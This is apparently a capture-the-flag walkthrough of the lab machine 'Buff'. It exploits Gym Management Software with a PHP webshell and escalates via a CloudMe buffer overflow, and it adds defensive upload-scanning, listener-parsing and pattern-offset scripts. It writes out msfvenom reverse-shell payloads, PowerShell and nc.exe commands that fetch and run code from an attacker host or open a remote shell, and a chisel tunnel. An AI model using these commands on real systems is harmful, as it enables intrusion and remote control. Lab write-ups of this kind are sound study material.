Start
IP: 10.129.2.18
Enumeration
As always, let's start with a nmap scan to see what we have.
eric@blog:~$ nmap -sSV -p- -oA 1_init_nmap 10.129.2.18
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-05 16:05 EDT
Nmap scan report for 10.129.2.18
Host is up (0.048s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 249.52 seconds
Two ports are revealed: 7680, where the service was not confidently fingerprinted, and 8080, Apache on Windows.
8080 - Apache
Taking a glance at the website, we see "mrb3n's Bro Hut", which appears to be some sort of fitness site. Right-clicking to view the source, I see where some of the css / js lives, in /boot. Attempting to access this directory directly throws a 403 Forbidden, so no directory browsing is enabled. On the contact page, we see "Made using Gym Management Software 1.0".
A simple searchsploit "Gym Management" reveals multiple vulnerabilities, including SQL injection, Auth Bypass, XSS, and Unauthenticated RCE. Unauthenticated RCE sounds great, sign me up.
Exploitation
Reviewing the code for /usr/share/exploitdb/exploits/php/webapps/48506.py, this exploit allows access to the upload.php file, uploads a php webshell as a fake png, and then allows you to interact at /upload.php?id=kamehameha. Unfortunately, this file was written in python 2.7, so we need to make some slight modifications to get it to work in python3.
cp /usr/share/exploitdb/exploits/php/webapps/48506.py ./48506.py. Then the following changes need to be made on lines 48, 81, 83 and 84: change the print statements to print() calls. Once finished, let's run it.
eric@blog:~$ python3 48506.py http://10.129.2.18:8080/
SIG += BL+' \/'+RS+'\n'
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
Exiting.
With the webshell active, we can visit http://10.129.2.18:8080/upload/kamehameha.php?telepathy=whoami and it returns buff\shaun.
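The weakness this step exploits is an upload handler that trusts the file name rather than the file contents, so a PHP file dressed up as a png lands in a web-served directory. From the defender's side, the upload directory itself is easy to audit. The following is an added example, not code from the post or from Gym Management Software: it walks an upload directory and flags files that contain a PHP open tag, carry a PHP extension anywhere in the name, or claim an image extension without the matching magic bytes. The function names, the tempdir layout and the three sample files are my own construction.

```python
import re
import tempfile
from pathlib import Path

# Magic bytes for the image types an upload form typically claims to accept.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# "<?php" or "<?="; the bare short tag "<?" is too noisy (XML prologues).
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
PHP_EXTENSIONS = {".php", ".phtml", ".php5", ".phar"}


def inspect_file(path: Path) -> list[str]:
    """Return the findings for one file; an empty list means it looks clean."""
    findings = []
    data = path.read_bytes()
    suffixes = [s.lower() for s in path.suffixes]  # "shell.php.png" -> [".php", ".png"]

    # 1. PHP code inside anything stored under the upload root, whatever the name
    if PHP_TAG.search(data):
        findings.append("contains PHP open tag")

    # 2. executable extension anywhere in the name (double-extension trick)
    if any(s in PHP_EXTENSIONS for s in suffixes):
        findings.append("php extension in name")

    # 3. claimed image type whose header does not match
    last = suffixes[-1] if suffixes else ""
    magic = IMAGE_MAGIC.get(last)
    if magic is not None and not data.startswith(magic):
        findings.append(f"{last} extension but header is not {last} magic")
    return findings


def scan_upload_dir(upload_dir: str) -> dict[str, list[str]]:
    """Walk the directory and map relative path -> findings for suspicious files only."""
    root = Path(upload_dir)
    report = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            findings = inspect_file(p)
            if findings:
                report[str(p.relative_to(root))] = findings
    return report


def build_sample_upload_dir() -> str:
    """Constructed sample directory: one real PNG, one PHP file named as a png,
    one double-extension file with a valid PNG header followed by PHP."""
    d = tempfile.mkdtemp(prefix="upload_")
    (Path(d) / "logo.png").write_bytes(IMAGE_MAGIC[".png"] + b"\x00" * 16)
    (Path(d) / "avatar.png").write_bytes(b"<?php echo 'not an image'; ?>")
    (Path(d) / "pic.php.png").write_bytes(IMAGE_MAGIC[".png"] + b"<?php echo 'polyglot'; ?>")
    return d


if __name__ == "__main__":
    for name, findings in scan_upload_dir(build_sample_upload_dir()).items():
        print(f"{name}: {', '.join(findings)}")
```

Checking the header and the tag separately matters: the polyglot case passes the magic-bytes check that a naive upload filter relies on, and only the content scan catches it. On the server side the same idea applies in reverse, which is to store uploads outside the web root or with PHP execution disabled for that directory.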
Post-Exploitation
Enumeration
We are in a command shell on Windows, so our commands need to be Windows ones. dir returns:
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\upload
06/06/2026 02:40
I can easily navigate to the home directory with dir C:\users\shaun\. Poking around here, we find user.txt in Desktop, whose contents we can reveal with type.
Shell Upgrade
The current PHP script is great, but we need something better. Using msfvenom, we can generate a simple payload: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f ps1 > shell.ps1.
We can then start a web server on our attackbox to serve the payload via python3 -m http.server. Using the webshell, I tried several variants, including certutil and curl, neither of which worked. The one that finally worked was ?telepathy=powershell -Command "Invoke-WebRequest -Uri 'http://10.10.10.10:8000/test.ps1' -OutFile 'C:\users\shaun\downloads\test.ps1'", which grabbed the file. Then a second ?telepathy=powershell -ExecutionPolicy Bypass -File C:\users\shaun\downloads\test.ps1 executes it.
Finally, a shell pops on my listener. Poking around and running some other shell commands reveals that the antivirus is enabled and blocking. Unfortunately, we're still in a dumb shell, although it is better than the php-only shell. Let's try again. On our attacking machine, the windows-binaries directory contains nc.exe, so we can start our web server with python -m http.server again and fetch this file.
# victim
iwr -URI 'http://10.10.10.10:8000/nc.exe' -OutFile 'C:\users\shaun\downloads\nc.exe'
# attacker
nc -lvnp 4440
# victim
cd C:\users\shaun\downloads
.\nc.exe 10.10.10.10 4440 -e powershell
Finally a better shell!
More Enumeration
In C:\xampp, a passwords.txt exists with default passwords. Attempting other commands such as wmic logicaldisk get name, fsutil fsinfo drives or net use throws the same "malicious content blocked by AV" error.
A tasks.bat exists under Shaun's Documents folder, with the line START C:/xampp/xampp_start.exe. Under Downloads, CloudMe_1112.exe exists. Using tasklist /SVC, CloudMe.exe is running under PID 4328.
Using searchsploit, we discover this version is susceptible to a buffer overflow that can allow remote code execution, CVE-2020-37070. The exploit targets the service listening on port 8888. netstat -ano | findstr 8888 confirms this port is listening, but only on localhost and not exposed to our attacker machine.
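A service bound only to 127.0.0.1 never shows up in an external nmap scan, which is why the CloudMe listener was invisible during enumeration yet still reachable from the foothold. For the blue team, the loopback-only listeners on a host belong in the patching inventory just like the exposed ones. The following is an added example, not from the post: it parses the text of netstat -ano and tasklist /SVC, joins them on PID, and reports TCP listeners bound to loopback with the owning image. Both output samples are constructed to mimic the real column layout; the PIDs, image names and ports in them are made up, apart from reusing the 8888/4328 pairing mentioned above, and the function names are my own.

```python
import re

# Constructed sample of `netstat -ano` output (not captured from the box).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2044
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       4328
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       6120
  TCP    10.129.2.18:8080       10.10.10.10:51234      ESTABLISHED     2044
  TCP    [::1]:8888             [::]:0                 LISTENING       4328
  UDP    0.0.0.0:5353           *:*                                    1564
"""

# Constructed sample of `tasklist /SVC` output used to map PID -> image name.
TASKLIST_SAMPLE = """
Image Name                     PID Services
========================= ======== ============================================
httpd.exe                     2044 N/A
CloudMe.exe                   4328 N/A
svchost.exe                   6120 DoSvc
"""

LOOPBACK = {"127.0.0.1", "::1"}


def split_addr(addr):
    """Split 'host:port' (IPv4, or bracketed IPv6 like [::1]:8888) into (host, int port)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port) if port.isdigit() else None


def parse_netstat(text):
    """Turn `netstat -ano` rows into dicts. UDP rows have no State column, so
    they split into four fields instead of five."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # banner, header, blank lines
        if parts[0] == "TCP":
            proto, local, foreign, state, pid = parts
        else:
            proto, local, foreign, pid = parts
            state = ""
        host, port = split_addr(local)
        rows.append({"proto": proto, "host": host, "port": port,
                     "foreign": foreign, "state": state, "pid": int(pid)})
    return rows


def parse_tasklist(text):
    """Map PID -> image name from `tasklist /SVC`, skipping the header and separator."""
    pids = {}
    for line in text.splitlines():
        m = re.match(r"^(\S+\.exe)\s+(\d+)\b", line, re.IGNORECASE)
        if m:
            pids[int(m.group(2))] = m.group(1)
    return pids


def loopback_only_listeners(netstat_text, tasklist_text):
    """TCP sockets in LISTENING state bound to a loopback address, keyed by port,
    with the PID and image that owns them. IPv4 and IPv6 rows for the same
    port collapse into one entry."""
    images = parse_tasklist(tasklist_text)
    found = {}
    for r in parse_netstat(netstat_text):
        if r["proto"] == "TCP" and r["state"] == "LISTENING" and r["host"] in LOOPBACK:
            found.setdefault(r["port"], {"pid": r["pid"], "image": images.get(r["pid"], "?")})
    return found


if __name__ == "__main__":
    for port, info in loopback_only_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE).items():
        print(f"127.0.0.1:{port} <- {info['image']} (PID {info['pid']})")
```

Run against real output, the same two commands are the ones used in the post, so this is also a quick way to diff what the host believes is listening against what the external scan saw.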
Priv-Esc // Exploitation
First, let's start with the exploit code, cp /usr/share/exploitdb/exploits/windows/local/48499.txt 48499.py. Following the instructions, we generate the msfvenom payload using msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python for our listener and paste it into the script. We now have our final python payload.
The next hurdle is that all of the public exploit code is written in python or ruby, neither of which is available locally on the victim machine. I racked my brain here a bit on what to do next. I have done SSH reverse tunnels before, but we don't have credentials for that. Alternatively, we could try to convert the python to another language (difficult) or package python with it somehow.
I checked for ssh, but unfortunately none is available. I searched on Google for "how to tunnel traffic from windows to linux without ssh" and one of the first links is to here, explaining a tool named chisel. It appears this was bundled with Kali at some point, but no longer is.
sudo apt update followed by sudo apt install chisel gets us the Kali version, v1.11.6. I downloaded the latest v1.11.5 version from GitHub here and copied it over to /usr/share/windows-resources/binaries for any future use.
Per the superuser link above, here's how we can tunnel:
# on attacker, in dir where chisel.exe is located
python -m http.server
# on victim
iwr -URI 'http://10.10.10.10:8000/chisel_1.11.5_amd64.exe' -OutFile 'C:\users\shaun\downloads\chisel.exe'
# on attacker
chisel server --reverse --port 9001
# on victim
.\chisel.exe client 10.10.10.10:9001 R:8888:127.0.0.1:8888
Our tunnel shows as connected. Spawn another tab on our attacker box to listen with nc -lvnp 4443, and execute the payload with python3 48499.py. We get an error that we cannot concatenate str to bytes. Let's fix the script by adding a b prefix to the junk1, nops and junk2 strings. The payload now executes, but the reverse shell doesn't light up.
Let's try a PoC that doesn't have the SEH, DEP and ASLR bypasses built in, 48389. I copied over the payload and had to make a number of changes:
- swap the payload and buf variables, as our msfvenom-generated payload used buf.
- change the exception handler to print(e).
Executing the payload with python3 48389.py lights up the listener, in C:\Windows\system32. whoami reveals we are buff\administrator.
Admin
root.txt is found under C:\users\administrator\desktop\root.txt, completing the box.
Lessons Learned
The initial access was fairly straightforward thanks to the version information found on the website and a quick searchsploit to find vulnerabilities. Upgrading from the php shell to a more stable shell was more of a challenge. In the end, even using nc.exe did not feel incredibly stable. While attempting to use chisel for the first time, I made a couple of errors where CTRL+C ended up killing my shell and required me to re-exploit. I had 3 Windows shells by the end; in the future I could skip the msfvenom ps1 altogether and go straight to nc.exe.
The AV on the machine was hit or miss on what it decided to block. It was initially blocking some of my original payloads without returning output to the php shell, making it difficult to troubleshoot. I also initially tried to target port 9001 for the exploit, not realizing the actual 8888 was also forwarded over. Instead of needing to heavily modify variable names in the actual exploit code, I could've used msfvenom's -v payload option to name the output variable differently.
This article explains how to actually craft the buffer overflow code yourself using Immunity Debugger and mona.py. It starts with a basic payload, sending thousands of 'A's to determine if anything happens. After several increases, the SEH is overwritten, which crashes the application. mona.py can then be used to generate a unique cyclic pattern instead of just As, to identify the exact offsets to use, and to find a pop pop ret to redirect to the payload.
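The "unique rotation of letters" step is what makes a crash informative rather than just a crash: if every 4-byte window of the sent data is unique, the value that lands in a register or in the SEH record tells you exactly which offset in the buffer overwrote it. The following is an added example, not code from the article, from mona.py or from this post: it implements the same Upper/lower/digit cyclic pattern that mona's pattern_create and pattern_offset commands (and Metasploit's pattern_create.rb) use, looks up a debugger-reported 32-bit value in it, and derives the nSEH/SEH pair for an SEH overwrite. The function names are my own, and the 0x41326141 sample value in the test is constructed, not taken from a real crash.

```python
import string
import struct

# 26 uppercase x 26 lowercase x 10 digits, three bytes each: the pattern
# repeats after 20280 bytes, so offsets are only unambiguous inside one cycle.
MAX_PATTERN = 26 * 26 * 10 * 3


def pattern_create(length):
    """Generate the cyclic pattern Aa0Aa1Aa2...Aa9Ab0... truncated to `length` bytes."""
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                out += (up + lo + dg).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])  # caller asked for more than one full cycle


def pattern_offset(value, length=MAX_PATTERN):
    """Locate a 4-byte window in the pattern and return its offset (-1 if absent).

    `value` is what the debugger shows: an int register/SEH value (stored
    little-endian in memory, so it is packed back to bytes first), or the
    raw str/bytes taken from a memory dump.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    elif isinstance(value, str):
        needle = value.encode("ascii")
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)


def seh_layout(seh_value):
    """For an SEH overwrite the handler pointer sits 4 bytes after nSEH, so
    the offset of the handler value gives both fields of the record."""
    seh = pattern_offset(seh_value)
    if seh < 0:
        return None
    return {"nseh": seh - 4, "seh": seh}


def check_unique(length=MAX_PATTERN):
    """Confirm every 4-byte window in one cycle is distinct; this property is
    what lets a single crash value be mapped back to one offset."""
    p = pattern_create(length)
    windows = {p[i:i + 4] for i in range(len(p) - 3)}
    return len(windows) == len(p) - 3


if __name__ == "__main__":
    print(pattern_create(20))
    print("offset of 0x41326141:", pattern_offset(0x41326141))
    print("SEH layout:", seh_layout(0x41326141))
    print("all 4-byte windows unique:", check_unique())
```

The little-endian packing is the detail people usually trip over: a register showing 41326141 contains the bytes "Aa2A" in memory, so searching for the hex digits as text finds nothing while packing them with struct gives the right answer.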